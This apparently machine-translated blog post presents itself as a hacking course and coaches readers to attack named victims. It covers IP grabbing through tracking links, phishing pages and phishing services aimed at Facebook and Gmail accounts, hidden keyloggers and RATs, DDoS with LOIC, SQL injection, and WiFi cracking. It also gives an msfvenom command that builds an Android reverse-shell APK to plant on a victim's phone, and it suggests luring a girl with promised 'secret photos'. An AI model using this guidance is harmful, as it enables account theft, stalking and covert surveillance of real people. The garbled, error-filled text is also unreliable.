Hacking Science A to Z [Giga Tune] :: [Episode-03]

 


A hacker
 is a real world hero, whether he is a hero or a villain, but a hacker means a cinematic celebrity, so there is an intense but latent interest in being a hacker in almost all of us.
In my article today I will try to teach you from the beginning to the end of hacking (although know that hacking has a beginning but not an end) so that after reading this article you may not be a hacker yourself but at least at the end of reading you will be satisfied that you are at least hacking The matter is well known; You too can be a hard hitter hacker if you want!

What is hacking and who is a hacker?
Hacking in Sojasapta means "stealing" and the person who steals means "hacker" but the conventional definition is "a hacker is someone who breaks into a system to find a security vulnerability" it could be your computer or your bank account. There is no difference; The hacking thing extends from cyberspace to human psychology today.
From the point of view of ethics, there are 3 types of hackers such as (1) White Hat Hacker or white hat hackers who do not use any hacking skills, they can be called ethical hackers. Although it is difficult to find such hackers nowadays, it is not wrong to think that every cyber security specialist is an ethical hacker. (2) Gray Hat Hacker (3) Black Hat Hackers or black hat hackers are those who abuse the hacking knowledge.
Also in terms of qualifications and activities (1) script kiddies who use other people's tools / scripts (2) neophytes who are just learning hacking (3) hacktivists who use hacking for religious or political purposes etc. There are different types.

Handcuffs of hacking knowledge

IP Address:
IP Address (IP Address = Internet Protocol) is your single identity in the Internet world that you get to be your service provider. Basically, if you want to know about hacking, you must first know about this IP address because all the information of your victim (the system you want to hack) is hidden inside this IP address.
If you type what is my ip address directly from Google, you will get your ip address. Besides, you can get IP address from Start-> Run-> cmd -> enter on the computer and you can also get the IP address and information of any website http: // www. Many sites like who.is or http://get-site-ip.com are like search tools.

IP Address Hacking:
To hack someone else's IP address you go to https://grabify.link/ and click creat url with any valid link in the blank box> fill in the captcha> copy the new URL part to the new page and send it to the victim Keep close. This time, if the victim clicks on the link sent by you, you will get his IP Address and other information at the bottom of the page as soon as you enter that Access Link.
Also, if you are an email service provider that uses the http protocol, you may be able to get the IP of the email host from Reply> Show Original (although all currently established email service providers use the https protocol).
Again http://readnotify.comRegister on the website> Write an email to the person whose IP address you want to hack> Write victim'semailid.rednotify.com in the Email to section area> Send it now. This time, whenever the person opens your email, you will get his IP address in that rednotified account.

Location tracing from IP address:
You can trace the location of any IP address by going to http://www.ip2location.com , even by going to Google and typing IP address to location finder online you will get many tools from where you can know the location of IP address even Google You can also detect its location on the map / satellite.
Note that many people in Bangladesh are even embarrassed to trace the location from the IP address because you are in Comilla and Dhaka shows the IP location, why is that? The main reason for this is that you are using sub-IP from your service provider and your location is also according to that sub-IP; If you want, you can become the owner of a real IP yourself, then these plagues will not remain!


Anonymous Hoon: Anonymous means newcomer ; Being anonymous is basically the name of hiding oneself in the world of internet. Anonymous does not mean wearing a mask and claiming to be an anonymous hacker, but rather a hacker prefers to be anonymous in order to hide himself / herself.
First of all, you can use a proxy to hide your IP address.
Basically when you use Google the information is exchanged in such a way that your computer> Google Server> your computer; So your IP address can be easily identified here. But if you use a proxy, the information is exchanged, such as your computer> proxy> Google server> proxy> your computer where your identity is hidden by that proxy.
To use the proxy, go to Google and type free proxy server, then collect an IP address and port from the search results, then go to Internet Explorer of PC, go to tools> internet option> connection> lan setting> proxy server> tick mark in two boxes and IP address in the other two cells. Enter the corresponding port> Your proxy has been taken.
In case of Mozilla Firefox, tools> options> advanced> network> settings> IP and port> ok
If you want to get a proxy on Android, you will get many free and paid VPNs from Google which you can hide yourself from. Also use online proxies http://www.hidemyass.com/ https://proxybrowser.xyz/ https://hide.me http://proxurf.com/ https://kproxy.com/ Websites also use as proxy tools Can.
You should change your MAC address not only by changing the IP address or taking a proxy to be anonymous but you should also change the MAC address. However, wearing a mask does not mean anonymous but anonymity depends on your behavior in the internet world.

MAC address:
MAC address (Mac Address = Media Access Control Address) is the 12-digit hexadecimal number that identifies a network device.
Note that to protect yourself from real anonymous hackers or to hide yourself, you have to change this Mac Address (it can be changed on PC as well as Android). Mac spoofing is just as famous in the hacking world; You may be surprised to know that the Emu account could have been hacked from this Mac spoofing (although in the updated version it is no longer possible).

Social Engineering:
Social engineering means cheating in simple words but this social engineering is the most powerful psychological software in the world of hacking. Suppose you want to hack a girl's IP address then you can tell her with the link of IP logger that if that link has some secret photos of her then she will be tempted to enter it; Here is the mind trick that tempted him to do social engineering. Remember that there are no hard and fast rules in social engineering, but the more skillfully you present your intelligence and cunning, the more likely you are to succeed.

Phishing:
Phishing is a type of fishing where you catch the victim like a fish with a bait and complete your hacking activity. Creating a duplicate page of any website to capture the victim's login info and other information in it. Index.html is a fake page run.php is content control id.txt login data etc. Files work on your hosting site.
Understand phishing in plain language "Suppose you want to hack your friend's Facebook account then give him a link whose web page looks exactly like Facebook and entice him to login then you will get his login info and password in that phishing account ".
You can create phishing pages by creating files from the source code of any webpage on any hosting site, however phishing depends on your social engineering skills.
In addition, instead of creating a difficult phishing site, you can register on the site http://www.anomor.com and get various types of phishing links, including Gmail, Facebook and the victim's login data (password, username, IP address) in the victim folder. Again you can use http://shadowave.com or http://shadowave.info/ and http://z-shadow.info/m/ websites to hack specific Facebook accounts .

Kilgar:
Kilgar is a system where you can know what the victim will type on his PC / mobile and from letter analysis you can hack the victim's website, Facebook, bank account.
In case of computer you can use Armadesk. You can bind your Killer to a different file so that the victim's system can be attacked without the victim's knowledge, and you can also use a Trojan. 'Who constantly provides information]. You can use https://www.hoverwatch.com/free-android-keylogger for
Android as an offline killer You can use Hacker Keyboard again download ডাউনলোড http://url.ie/12mhtYou can also use Hacker Keylogger App Download ডাউনলোড http://url.ie/12mhr

Brutforce Attack: Brutforce
Attack is the name of the chester to login to any system by entering the user ID and possible password one by one in the login panel.
Basically, the timing of a Britforce attack is relative and uncertain, but the capture option is kept to prevent an attack so that no program can robotically attack that system.
You can use different software as well as Linux to use Brutforce Attack from a computer and you can use a terminal on Android.
Success in Brutforce depends on the password list, so creating a custom password list (create aassword by analysis of victim's nature & behavior) and creating a manual Brutforce attack increases the chances of success by 90%.

Nonsense about Brutforce:
Suppose you want to hack Karim's Facebook ID, and in your mind you catch the password of his ID iloveyou. Now try to login, then there is a 99.99% chance that you will fail. However, you can't say for sure that this iloveyou text is not a password for anyone in the world, so tell me what happens if you leave the same password constant and attack Brutforce with his ID code in a different ID?
In this case, the common word is the attacking password and the ID code list is just a combination of the target account.
Hacking never stays in the ego of the mind; Hacking is in the brain of the head!

DOS / DDOS Attack:
DOS (Denial of Service) and DIDS (Distributed Denial of Service) attack is the act of sending a packet of data packets / packages to a website for a very short period of time, destroying it for a period of time and shutting down the server so that no one visits that site. Can't
Suppose a website is ABC whose hosting server bandwidth is 1GB / Day; Hits 10000 / day; max needed bandwidth lese then 400 mb / day Now if the site hits 25000 from a false script in 1 hour so that the bandwidth exceeds 1GB, then the site will be temporarily stagnant and no one will be able to visit the site. DDOS attack.
In addition to the separate software on the computer can be given a DIDS attack from the Linux command, and on the Android LOIC App (you can find it by searching on Google; it has both PC and Android versions) DIDS attack can be given to any site even from a terminal.
Originally working as a group, DIDS attacks can easily be hacked on any website (this is why DIDS prevention measures are put in place on the hosting servers of advanced websites).

RAT:
RAT (Remote Administration Tool) is a virus that enters any computer like a mouse and is able to gain access to any computer such as PC camera or skin coaching, file access or analysis, shell uploading, PC control etc. For example Trojan horse virus download any file / Upload / delete or rename, drive format, auto open cd / dvd rom, release virus or worm on pc, bypass key-stroke log, hack password or credit card number, hijack website homepage, auto screen capture Auto-record / run / delete any task in the taskbar, hide the desktop, taskbar or any file, print any text without commands, play auto sound, abnormal movement of mouse cursor, auto-record sound of connected microphone etc., video recording by webcam Proficient in activity.
Notable among the various RATs are Shark, Bifrost, Bandook, BO2K, ProRAT, SpyRAT, HackRAT, Netbos, Optixe, AutoSpY, Nclear, Amituer, Bandk, Yuri RAT, Y3k RAT, slha RAT, Openx RAT, Poison Ivy RAT, Mosucker, SubSeven. RAT, Nuclear RAT, NetBus RAT, ProRAT, megapanzer, LanHelper etc.

Session Hijack:
Session hijacking is about stealing cookies from a victim's browser, participating in and accessing their sessions, or stealing cookies from two different browsers on the same network. However, data encryption in the https protocol is almost impossible; That's why the name of a common hacking could be heard that when Facebook used the http protocol, it could be accessed from Facebook to someone else's Facebook ID.

Domain hijacking:
Hacking the domain of any website and separating it from its hosting server and replacing it with the hosting site of the hacker's domain is the domain hijack for which everyone has to hack the domain registration info knowing its email address Is done.

Website Hacking:
There are many ways to attack any website's server such as SQL injection, PHP remote execution, web ripping, Google hacking.
SQL injection is when a website's database is SQL vernable (vulnerabilities can be checked using a 'at the end of a web link') by injecting SQL into it, collecting the username and encrypted password from its admin column, then decrypting the password and decrypting it. The entire site is accessed by the user ID and password in the admin panel.
You can find many software and apps on PC and Android versions of Google to inject such XQL.
Again there are many online admin panel finders besides havies for PC to find out the admin panel. Again, you can manually search the admin panel by analyzing the URL.
Although this SQL injection method is a bit annoyingly complex and time consuming, its popularity and use is very popular in the hacker society.

Facebook ID Hacking
A true hacker can never be proud of being a Facebook ID hacker, but Facebook Server Hack and Facebook ID Hack are not the same thing; If you practice the above rules well, you will be able to become at least proficient in hacking not only Facebook account but also any website or system. However, note that to hack Facebook ID, you can hack other people's Facebook ID in different ways like phishing, killer, device access, social engineering, spoofing etc.

WiFi hacking:
You can hack WiFi from PC to Linux or Android terminal commands, Aircrack-ng on Windows, wpa wps connector apps, wifi map, to show passwords saved on Android Open the prompt and type netsh wlan show profile name = WIFI NAME / SSID key = clear.
You can also hack WiFi using Brute Force Attack or Key Logger or Hidden Screen Recorder apps.
Listen to a funny thing?
Real hackers hack WiFi not to use the free net but to hack into an active computer or system on that network, so if you want to grow yourself, you should increase your focus first!

Android Hacking: You can use https://web.airdroid.com/ to
get remote access to hack someone else's Android mobile (there are many sites from which you can get remote access to hack someone else's Android mobile such as https: // www .cerberusapp.com/ etc), again you can use Tickle My Phone apps to hack Android mobile without internet connection. You can gain access by installing Hack.apk on Victim Android using the command $ ruby ​​msfvenom -p android / meterpreter / reverse_tcp LHOST = your ip LPORT = port R> /sdcard/Hack.apk.
There are more and more Android hacking tricks like this, it's just a matter of inventing your brain's neurons with just a little effort; Remember that hacking is never written in a book, but hacking is born. There is morality in the head of an intelligent person.

Inspiration for writing this article:
In today's cyberspace of Bangladesh, this "respect" thing has almost gone up, so there is so much slander and despicable attempt to belittle others which can never be the behavior of an ideal hacker.
If you expect others to respect you, learn to respect them first.

Learn hacking from me?
See, if one of us shares two / one hacking tricks, others will say, "Brother, teach hacking". Well will you learn hacking from me or will you learn hacking from the great teacher from whom I learned hacking?
My teacher is the internet so you too start learning hacking from the internet.
But learning everything requires a guide; In the case of hacking, even if you consider him a guru at the beginning, if you have a disgusting mentality like turning him into a cow after learning, you will never get a full education. So there is no need to be overly devoted to the guru, if you have a little more generous mentality and minimal courtesy, you can be successful not only in hacking but in all aspects of life.

Conclusion:
I wish you all the best and success. Remember that education is not a substitute for success in life so start learning today. Tomorrow's success is waiting for you!
There was an invitation to be join my Facebook Page → Tech 2 Time

God bless you

Post a Comment

Previous Post Next Post